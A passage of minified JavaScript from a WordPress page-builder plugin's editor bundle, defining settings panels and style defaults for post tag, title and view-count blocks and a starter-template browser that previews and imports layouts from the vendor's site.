Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}},{data:{type:"typography",key:"tagTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"tagSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Space Between Tags","ultimate-post")}},{data:{type:"dimension",key:"tagItemPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Tag Label","ultimate-post"),depend:"tagLabelShow",initialOpen:!1,include:[{data:{type:"text",key:"tagLabel",label:__("Tag Label","ultimate-post")}},{data:{type:"color",key:"labelColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"labelTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"tagLabelSpace",min:0,max:100,step:1,responsive:!0,unit:!0,label:__("Spacing","ultimate-post")}},{data:{type:"color",key:"labelBgColor",label:__("Background","ultimate-post")}},{data:{type:"dimension",key:"tagLabelPad",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{data:{type:"border",key:"tagLabelBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"tagLabelRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"tagIconShow",include:[{data:{type:"icon",key:"tagIconStyle",label:__("Select Icon","ultimate-post")}},{data:{type:"color",key:"tagIconColor",label:__("Icon Color","ultimate-post")}},{data:{type:"color",key:"tagIconHovColor",label:__("Hover Color","ultimate-post")}},{data:{type:"range",key:"tagIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Size","ultimate-post")}},{data:{type:"range",key:"tagIconSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Icon Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("div",{className:"ultp-builder-tag"},f&&a.ZP[k],(0,o.createElement)("div",{className:"tag-builder-label"},h&&v),(0,o.createElement)("div",{className:"tag-builder-content"},(0,o.createElement)("a",{href:"#"},"Dummy Tag 1"),(0,o.createElement)("a",{href:"#"},"Dummy Tag 2"),(0,o.createElement)("a",{href:"#"},"Dummy Tag 3"))))))}},56216:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},tagLabelShow:{type:"boolean",default:!0},tagIconShow:{type:"boolean",default:!0},tagColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a, {{ULTP}} .tag-builder-content {color:{{tagColor}};}"}]},tagBgColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a {background:{{tagBgColor}};}"}]},tagItemBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#e2e2e2",type:"solid"},style:[{selector:"{{ULTP}} .ultp-builder-tag a"}]},tagRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-tag a { border-radius:{{tagRadius}}; }"}]},tagHovColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover { color:{{tagHovColor}}; }"}]},tagBgHovColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover {background:{{tagBgHovColor}};}"}]},tagItemHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#000",type:"solid"},style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover"}]},tagHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-tag a:hover{ border-radius:{{tagHoverRadius}}; }"}]},tagTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:""},style:[{selector:"{{ULTP}} .ultp-builder-tag a"}]},tagSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} .ultp-builder-tag a:not(:last-child) {margin-right:{{tagSpace}}}"}]},tagItemPad:{type:"object",default:{lg:{top:"0",bottom:"0",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-tag a{ padding:{{tagItemPad}} }"}]},tagAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-tag { justify-content:{{tagAlign}}; }"}]},tagLabel:{type:"string",default:"Tags: ",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}]}]},labelColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label {color:{{labelColor}};}"}]},labelBgColor:{type:"string",default:"",style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label {background:{{labelBgColor}};}"}]},labelTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label"}]},tagLabelSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label{margin-right:{{tagLabelSpace}}}"}]},tagLabelBorder:{type:"object",default:{openBorder:0},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label"}]},tagLabelRadius:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-tag .tag-builder-label{ border-radius:{{tagLabelRadius}}; }"}]},tagLabelPad:{type:"object",default:{},style:[{depends:[{key:"tagLabelShow",condition:"==",value:!0}],selector:"{{ULTP}} .tag-builder-label{ padding:{{tagLabelPad}} }"}]},tagIconStyle:{type:"string",default:"",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}]}]},tagIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg {color:{{tagIconColor}}; color:{{tagIconColor}} }"}]},tagIconHovColor:{type:"string",default:"",style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg:hover {color:{{tagIconHovColor}}; color:{{tagIconHovColor}} }"}]},tagIconSize:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg {height:{{tagIconSize}}; width:{{tagIconSize}};}"}]},tagIconSpace:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"tagIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-builder-tag svg {margin-right:{{tagIconSpace}} }"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},81213:(e,t,l)=>{"use strict";var o=l(67294),a=l(62358),i=l(56216),n=l(75832);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_tag.svg",alt:"Post Tag"}),attributes:i.Z,edit:a.Z,save:()=>null})},13484:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(53049),i=l(99838),n=l(54324),r=l(66921);const{InspectorControls:s,useBlockProps:p}=wp.blockEditor,{Fragment:c}=wp.element;function u(e){const{setAttributes:t,clientId:l,name:u,attributes:d,className:m,attributes:{blockId:g,advanceId:y,titleTag:b,currentPostId:v}}=e,h={setAttributes:t,name:u,attributes:d,clientId:l};(0,n.S)({blockId:g,clientId:l,currentPostId:v,setAttributes:t,checkRef:!1}),g&&(0,i.Kh)(d,"ultimate-post/post-title",g);const f=p({id:y||void 0,className:`ultp-block-${g} ${m}`});return(0,o.createElement)(c,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Z,{store:h}),(0,a.dH)()),(0,o.createElement)("div",f,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)(a.VI,{tag:b,className:"ultp-builder-title"},"Sample Post Title"))))}},66921:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=e=>{const{store:t}=e;return(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Style","ultimate-post")},(0,o.createElement)(a.T,{initialOpen:!0,title:"inline",include:[{data:{type:"color",key:"titleColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"titleTypo",label:__("Typography","ultimate-post")}},{data:{type:"tag",key:"titleTag",label:__("Tag","ultimate-post")}},{data:{type:"alignment",key:"titleAlign",disableJustify:!1,responsive:!0,label:__("Alignment","ultimate-post")}}],store:t})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{store:t}),(0,o.createElement)(a.Mg,{pro:!0,store:t}),(0,o.createElement)(a.iv,{store:t})))}},69381:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-builder-title, .edit-post-visual-editor {{ULTP}} .ultp-builder-title {color:{{titleColor}};}"}]},titleTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-builder-title { margin:0 } {{ULTP}} .ultp-builder-title , .edit-post-visual-editor {{ULTP}} .ultp-builder-title"}]},titleTag:{type:"string",default:"h1"},titleAlign:{type:"object",default:{},style:[{selector:"{{ULTP}} .ultp-builder-title {text-align:{{titleAlign}};}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},31366:(e,t,l)=>{"use strict";var o=l(67294),a=l(13484),i=l(69381),n=l(96787);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/post_title.svg"}),attributes:i.Z,edit:a.Z,save:()=>null})},72567:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(64766),i=l(53049),n=l(99838),r=l(92637),s=l(54324);const{__}=wp.i18n,{InspectorControls:p,useBlockProps:c}=wp.blockEditor,{Component:u,Fragment:d}=wp.element;function m(e){const{setAttributes:t,name:l,attributes:u,clientId:m,className:g,attributes:{blockId:y,advanceId:b,viewLabelText:v,viewIconStyle:h,viewLabel:f,viewIconShow:k,currentPostId:w}}=e,x={setAttributes:t,name:l,attributes:u,clientId:m};(0,s.S)({blockId:y,clientId:m,currentPostId:w,setAttributes:t,checkRef:!1}),y&&(0,n.Kh)(u,"ultimate-post/post-view-count",y);const T=c({className:`ultp-block-${y} ${g}`,...b&&{id:b}});return(0,o.createElement)(d,null,(0,o.createElement)(p,null,(0,o.createElement)(r.Sections,null,(0,o.createElement)(r.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(i.T,{title:"inline",include:[{data:{type:"toggle",key:"viewLabel",label:__("Enable Prefix","ultimate-post")}},{data:{type:"color",key:"viewIconColor",label:__("Color","ultimate-post")}},{data:{type:"typography",key:"viewTypo",label:__("Typography","ultimate-post")}},{data:{type:"alignment",key:"viewCountAlign",disableJustify:!0,responsive:!0,label:__("Alignment","ultimate-post")}},{data:{type:"text",key:"viewLabelText",label:__("Text","ultimate-post")}},{data:{type:"group",key:"viewLabelAlign",options:[{label:"After Content",value:"after"},{label:"Before Content",value:"before"}],justify:!0,label:__("Prefix Position","ultimate-post")}}],store:x}),(0,o.createElement)(i.T,{title:__("Icon Style","ultimate-post"),depend:"viewIconShow",include:[{data:{type:"color",key:"iconColor",label:__("Color","ultimate-post")}},{data:{type:"icon",key:"viewIconStyle",label:__("Style","ultimate-post")}},{data:{type:"range",key:"viewIconSize",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Size","ultimate-post")}},{data:{type:"range",key:"viewSpace",min:0,max:100,responsive:!0,step:1,unit:!0,label:__("Space X","ultimate-post")}}],store:x})),(0,o.createElement)(r.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(i.yB,{store:x}),(0,o.createElement)(i.Mg,{pro:!0,store:x}),(0,o.createElement)(i.iv,{store:x}))),(0,i.dH)()),(0,o.createElement)("div",T,(0,o.createElement)("div",{className:"ultp-block-wrapper"},(0,o.createElement)("span",{className:"ultp-view-count"},k&&""!=h&&a.ZP[h],(0,o.createElement)("span",{className:"ultp-view-count-number"},"12 "),f&&(0,o.createElement)("span",{className:"ultp-view-label"},v)))))}},52141:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},viewLabel:{type:"boolean",default:!0},viewIconShow:{type:"boolean",default:!0},viewTypo:{type:"object",default:{openTypography:0,size:{lg:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-view-count > span"}]},viewCountAlign:{type:"object",default:[],style:[{selector:"{{ULTP}} .ultp-block-wrapper { text-align: {{viewCountAlign}};}"}]},viewLabelText:{type:"string",default:"View",style:[{depends:[{key:"viewLabel",condition:"==",value:!0}]}]},viewLabelAlign:{type:"string",default:"after",style:[{depends:[{key:"viewLabelAlign",condition:"==",value:"before"},{key:"viewLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count .ultp-view-label {order: -1;margin-right: 5px;}"},{depends:[{key:"viewLabelAlign",condition:"==",value:"after"},{key:"viewLabel",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count .ultp-view-label {order: unset; margin-left: 5px;}"}]},viewIconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{selector:"{{ULTP}} .ultp-view-count >span{ color:{{viewIconColor}} }"}]},viewIconStyle:{type:"string",default:"viewCount1",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}]}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count > svg { color:{{iconColor}}; color:{{iconColor}};} "}]},viewIconSize:{type:"object",default:{lg:"15",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count svg{ width:{{viewIconSize}}; height:{{viewIconSize}} }"}]},viewSpace:{type:"object",default:{lg:"8",unit:"px"},style:[{depends:[{key:"viewIconShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-view-count > span.ultp-view-count-number { margin-left: {{viewSpace}} }"},{depends:[{key:"viewIconShow",condition:"==",value:!0},{key:"viewLabelAlign",condition:"==",value:"before"}],selector:"{{ULTP}} .ultp-view-count > svg { margin: {{viewSpace}} } {{ULTP}} .ultp-view-count .ultp-view-label {margin: 0px !important;}"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},41977:(e,t,l)=>{"use strict";var o=l(67294),a=l(72567),i=l(52141),n=l(15648);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r(n,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/builder/view_count.svg",alt:"Post View Count"}),attributes:i.Z,edit:a.Z,save:()=>null})},75324:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);const i=e=>{const{useState:t,useEffect:l,useRef:i,onChange:n,options:r,value:s,contentWH:p}=e,[c,u]=t(!1),d=i(null),m=e=>{d?.current&&!d?.current.contains(e.target)?u(!1):d?.current&&d?.current.contains(e.target)&&!e.target.classList?.contains("ultp-reserve-button")&&u(!d?.current.classList?.contains("open"))};l((()=>(document.addEventListener("mousedown",m),()=>document.removeEventListener("mousedown",m))),[]);const g=r?.find((e=>e.value===s));return(0,o.createElement)("div",{ref:d,className:"starter_filter_select "+(c?"open":"")},(0,o.createElement)("div",{className:"starter_filter_selected"},g?g.label:"Select an option",a.ZP.collapse_bottom_line),c&&(0,o.createElement)("ul",{className:"starter_filter_select_options",style:{minWidth:p?.width||"100px",maxHeight:p?.height||"160px"}},r.map(((e,t)=>(0,o.createElement)("li",{className:"ultp-reserve-button starter_filter_select_option",key:t,onClick:()=>(e=>{u(!1),n(e.value)})(e)},e.label)))))}},70439:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766),i=l(12402),n=l(87763),r=l(75324);const{__}=wp.i18n,s=e=>{const{changeStates:t,column:l,showWishList:s,_fetchFile:p,fetching:c,searchQuery:u,fields:d,fieldValue:m,fieldOptions:g,useState:y,useEffect:b,useRef:v}=e;return(0,o.createElement)("div",{className:"ultp-templatekit-layout-search-container"},(0,o.createElement)("div",{className:"ultp-templatekit-search-container"},d?.filter&&(0,o.createElement)(o.Fragment,null," ",(0,o.createElement)("span",null,__("Filter:","ultimate-post")),(0,o.createElement)(r.Z,{useState:y,useEffect:b,useRef:v,value:m?.filter,contentWH:{height:"190px",width:"150px"},onChange:e=>{t("filter",e)},options:g?.filterArr||[]})),d?.trend&&m?.trend&&(0,o.createElement)(r.Z,{useState:y,useEffect:b,useRef:v,value:m?.trend,onChange:e=>{t("trend",e)},options:[{value:"all",label:__("Popular / Latest","ultimate-post")},{value:"popular",label:__("Popular","ultimate-post")},{value:"latest",label:__("Latest","ultimate-post")}]}),d?.freePro&&(0,o.createElement)(r.Z,{useState:y,useEffect:b,useRef:v,value:m?.freePro,onChange:e=>{t("freePro",e)},options:[{value:"all",label:__("Free / Pro","ultimate-post")},{value:"free",label:__("Free","ultimate-post")},{value:"pro",label:__("Pro","ultimate-post")}]})),(0,o.createElement)("div",{className:"ultp-templatekit-layout-container"},(0,o.createElement)(i.Z,{changeStates:t,searchQuery:u}),(0,o.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("2"==l?"ultp-lay-active":""),onClick:()=>t("column","2")},n.Z.grid_col1),(0,o.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("3"==l?"ultp-lay-active":""),onClick:()=>t("column","3")},n.Z.grid_col2),(0,o.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,o.createElement)("span",{className:"ultp-premade-wishlist cursor "+(s?"ultp-wishlist-active":""),onClick:()=>{t("wishlist",!s)}},a.ZP[s?"love_solid":"love_line"])),p&&(0,o.createElement)("div",{onClick:()=>p(),className:"ultp-filter-sync"},(0,o.createElement)("span",{className:"dashicons dashicons-update-alt "+(c?" rotate":"")}),__("Synchronize","ultimate-post"))))}},86008:(e,t,l)=>{"use strict";l.d(t,{Z:()=>m});var o=l(67294),a=l(60448),i=l(64766),n=l(8949),r=l(90356),s=l(70439);const{__}=wp.i18n,p=[{label:__("All","ultimate-post"),value:"all"},{label:__("Menu - PostX","ultimate-post"),value:"menu"},{label:__("Post Grid #1","ultimate-post"),value:"post-grid-1"},{label:__("Post Grid #2","ultimate-post"),value:"post-grid-2"},{label:__("Post Grid #3","ultimate-post"),value:"post-grid-3"},{label:__("Post Grid #4","ultimate-post"),value:"post-grid-4"},{label:__("Post Grid #5","ultimate-post"),value:"post-grid-5"},{label:__("Post Grid #6","ultimate-post"),value:"post-grid-6"},{label:__("Post Grid #7","ultimate-post"),value:"post-grid-7"},{label:__("Post List #1","ultimate-post"),value:"post-list-1"},{label:__("Post List #2","ultimate-post"),value:"post-list-2"},{label:__("Post List #3","ultimate-post"),value:"post-list-3"},{label:__("Post List #4","ultimate-post"),value:"post-list-4"},{label:__("Post Slider #1","ultimate-post"),value:"post-slider-1"},{label:__("Post Slider #2","ultimate-post"),value:"post-slider-2"},{label:__("Post Module #1","ultimate-post"),value:"post-module-1"},{label:__("Post Module #2","ultimate-post"),value:"post-module-2"},{label:__("News ticker","ultimate-post"),value:"news-ticker"},{label:__("Taxonomy","ultimate-post"),value:"ultp-taxonomy"},{label:__("Table of Contents","ultimate-post"),value:"table-of-content"},{label:__("Button Group","ultimate-post"),value:"button-group"},{label:__("List - PostX","ultimate-post"),value:"advanced-list"},{label:__("Search - PostX","ultimate-post"),value:"advanced-search"},{label:__("Accordion","ultimate-post"),value:"accordion"},{label:__("Star Ratings","ultimate-post"),value:"star-rating"},{label:__("Tabs","ultimate-post"),value:"tabs"},{label:__("PostX Gallery","ultimate-post"),value:"gallery"},{label:__("Youtube Gallery","ultimate-post"),value:"youtube-gallery"}],c=[{value:"all",label:__("All Categories","ultimate-post")},{value:"news",label:__("News","ultimate-post")},{value:"magazine",label:__("Magazine","ultimate-post")},{value:"blog",label:__("Blog","ultimate-post")},{value:"sports",label:__("Sports","ultimate-post")},{value:"fashion",label:__("Fashion","ultimate-post")},{value:"tech",label:__("Tech","ultimate-post")},{value:"travel",label:__("Travel","ultimate-post")},{value:"food",label:__("Food","ultimate-post")},{value:"movie",label:__("Movie","ultimate-post")},{value:"health",label:__("Health","ultimate-post")},{value:"gaming",label:__("Gaming","ultimate-post")},{value:"nft",label:__("NFT","ultimate-post")}],u=(e,t,l)=>`${e}/wp-content/uploads/sites/${t}/postx_importer_img/pages/${l.toLowerCase().replaceAll(" ","_")}.jpg`,d=({starterListModule:e,starterLists:t,setStarterListModule:l,useState:a,state:n,importStarterTemplate:r})=>{const s=t?.filter((t=>t.live==e)),{title:p,live:c,pro:d}=s[0],{templates:m}=s[0];["contact","about","blog","home"].forEach((e=>{m.forEach(((t,l)=>{t.name.toLowerCase().includes(e)&&m.splice(0,0,m.splice(l,1)[0])}))}));const[g,y]=a(m[0].name),[b,v]=a(m[0].ID),h=m?.filter((e=>e.ID==b))[0],f=c+("page"==h.type?"home_page"==h.home_page?"":"/"+h.name?.toLowerCase().replaceAll(" ","-"):"/postx_"+("archive"==h.builder_type?h.archive_type:h.builder_type));return(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-module-templates-footer"},(0,o.createElement)("div",{className:"ultp-module-title"},(0,o.createElement)("span",{onClick:()=>l("")}," ",i.ZP.collapse_bottom_line," Back"," ")," ",p),(0,o.createElement)("div",{className:"ultp-module-btn"},"ultp_builder"!=h.type&&(!ultp_data.active&&d?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:"https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=starter-site-upgrade&utm_campaign=postx-dashboard#pricing",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):(0,o.createElement)("button",{onClick:()=>r("https://postxkit.wpxpo.com/"+c,b,d),className:`ultp-template-btn ultp-template-btn-fill ${n.reload?"s_loading":""} `},__("Import Template","ultimate-post")," ",i.ZP[n.reload?"refresh":"upload_solid"])),"ultp_builder"==h.type&&(0,o.createElement)("a",{href:ultp_data.builder_url,target:"_blank",className:"ultp-template-btn ultp-template-btn-fill",rel:"noreferrer"},__("Go to Site Builder","ultimate-post")),(0,o.createElement)("a",{href:"https://postxkit.wpxpo.com/"+f,target:"_blank",className:"ultp-template-btn ultp-template-btn-line",rel:"noreferrer"},__("Live Preview","ultimate-post")," ",i.ZP.eye))),(0,o.createElement)("div",{className:"ultp-module"},(0,o.createElement)("div",null,m?.length&&(0,o.createElement)("div",{className:"ultp-module-templates"},m.map((({type:e,name:t,img:l,ID:a},i)=>!("ultp_builder"==e&&t.toLowerCase().includes("header")||t.toLowerCase().includes("footer"))&&(0,o.createElement)("div",{key:t,className:"ultp-module-item "+(b==a?"active":""),onClick:()=>{v(a),y(t)}},(0,o.createElement)("div",{className:"bg-image-aspect",style:{backgroundImage:`url(${u("https://postxkit.wpxpo.com/"+c,s[0].ID,t)})`}}),(0,o.createElement)("div",{className:"ultp-module-info"},t)))))),(0,o.createElement)("div",null,"ultp_builder"==h.type&&(0,o.createElement)("div",{className:"ultp-module-notice"},(0,o.createElement)("strong",null,__("Note:","ultimate-post"))," ",__("This is a builder template. Go to","ultimate-post")," ",(0,o.createElement)("a",{href:ultp_data.builder_url,target:"_blank",rel:"noreferrer"}," ",__("Site Builder","ultimate-post"))," ",__("and explore more","ultimate-post")),(0,o.createElement)("div",{className:"ultp-module-page"},(0,o.createElement)("img",{key:g,src:`https://postxkit.wpxpo.com/${c}/wp-content/uploads/sites/${s[0].ID}/postx_importer_img/pages/large/${g.toLowerCase().replaceAll(" ","_")}.jpg`,alt:g})))))},m=e=>{const{filterValue:t,state:l,setState:m,useState:g,useEffect:y,useRef:b,_changeVal:v,splitArchiveData:h,dashboard:f,setWListAction:k,wishListArr:w,starterListModule:x,setStarterListModule:T}=e,{current:_,isStarterLists:C,error:E,starterLists:S,designs:P,reload:L,reloadId:I,fetching:B,loading:U,starterChildLists:M,starterParentLists:A}=l,H=f?ultp_dashboard_pannel:ultp_data,[N,j]=g("3"),[Z,O]=g(""),[R,D]=g("all"),[z,F]=g("all"),[W,V]=g(!1),[G,q]=g({state:!1,status:""}),$="front_page"==H?.archive;let K=[..._],J=!!C&&!Z;const Y=["singular","archive","header","footer","404"].includes(H.archive);C&&Z&&(K=[...M],J=!1),"latest"==R||"all"==R?K.sort(((e,t)=>t.ID-e.ID)):"popular"==R&&K[0]&&K[0].hit&&K.sort(((e,t)=>t.hit-e.hit));const X=(e,t,o)=>{o&&!H.active||(m({...l,reload:!0,reloadId:t}),wp.apiFetch({path:"/ultp/v3/single_page_import",method:"POST",data:{api_endpoint:e,ID:t}}).then((e=>{e.success&&(wp.data.dispatch("core/block-editor").insertBlocks(wp.blocks.parse(e.content.content)),T(""),m({...l,isPopup:!1,reload:!1,reloadId:"",error:!1}))})))};let Q=(0,a.cC)(w.join(""),[]);return Q&&"object"==typeof Q&&!Array.isArray(Q)&&(Q=Object.keys(Q).sort(((e,t)=>e-t)).map((e=>Q[e]))),(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-templatekit-wrap"},G.state&&(0,o.createElement)(r.Z,{delay:2e3,toastMessages:G,setToastMessages:q}),(0,o.createElement)("div",{className:"ultp-templatekit-list-container "+(C&&x?"ultp-block-editor":"")},(C&&!x||!C)&&(0,o.createElement)(s.Z,{changeStates:(e,t)=>{"freePro"==e?F(t):"search"==e?O(t):"column"==e?j(t):"wishlist"==e?V(t):"trend"==e?D(t):"filter"==e&&(e=>{let t=[];const o=C?"starterListsFilter":"designFilter";t=C?S:P,m("all"==e?{...l,[o]:e,current:t}:{...l,[o]:e,current:C?t.filter((t=>t.parent_cat&&(Array.isArray(t.parent_cat)?t.parent_cat:Object.values(t.parent_cat||{})).includes(e)||t.category==e)):h(t,e)})})(t)},useState:g,useEffect:y,useRef:b,column:N,showWishList:W,searchQuery:Z,fetching:B,fields:{filter:!Y,trend:!0,freePro:!0},fieldOptions:{filterArr:!Y&&(C?c:p),trendArr:[],freeProArr:[]},fieldValue:{filter:Y?"all":t,trend:R,freePro:z}}),x&&C&&!Y?(0,o.createElement)(d,{useState:g,starterListModule:x,starterLists:S,setStarterListModule:T,importStarterTemplate:X,state:l,setState:m}):K?.length>0?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col"+N},K.map(((e,t)=>(Y||$?(e.name+" "+e.parent)?.toLowerCase().includes(Z.toLowerCase()):(C&&!Z?e.title:e.name)?.toLowerCase().includes(Z.toLowerCase()))&&(Z&&(C&&"ultp_builder"!=e.type||!C)||!Z)&&("all"==z||"pro"==z&&e.pro||"free"==z&&!e.pro)&&(!W||W&&Q?.includes(e.ID))&&(0,o.createElement)("div",{key:t,className:`ultp-item-wrapper ${J?"ultp-starter-group":""} ${e.parent?"ultp-single-item":""}`},(0,o.createElement)("div",{className:"ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)("a",{className:`ultp-templatekit-img ${["header","footer"].includes(e.builder_type)?"ultp_hf":""} ${Y||C||$?" bg-image-aspect":""} `,style:Y||$?{backgroundImage:`url(https://postxkit.wpxpo.com/${e.live}/wp-content/uploads/sites/${e.parentID}/postx_importer_img/pages/${e.name?.toLowerCase().replaceAll(" ","_")}.jpg )`}:C?{backgroundImage:`url(${J?u("https://postxkit.wpxpo.com/"+e.live,e.ID,"home"):u("https://postxkit.wpxpo.com/"+A[e.parent]?.live,A[e.parent]?.ID,e.name)})`}:{}},!(Y||C||$)&&(0,o.createElement)("img",{src:e.image,loading:"lazy",alt:e.name})),(0,o.createElement)("div",{className:"ultp-list-dark-overlay"},!H.active&&(0,o.createElement)(o.Fragment,null,e.pro?(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post"))),C?(0,o.createElement)(o.Fragment,null,J?(0,o.createElement)("a",{className:"ultp-overlay-view",onClick:()=>{T(e.live)}},i.ZP.search_line):(0,o.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay",href:"https://postxkit.wpxpo.com/"+e.live+"/"+e.name.toLowerCase().replaceAll(" ","-"),target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post"))):(0,o.createElement)("a",{className:"ultp-overlay-view ultp-dashboverlay 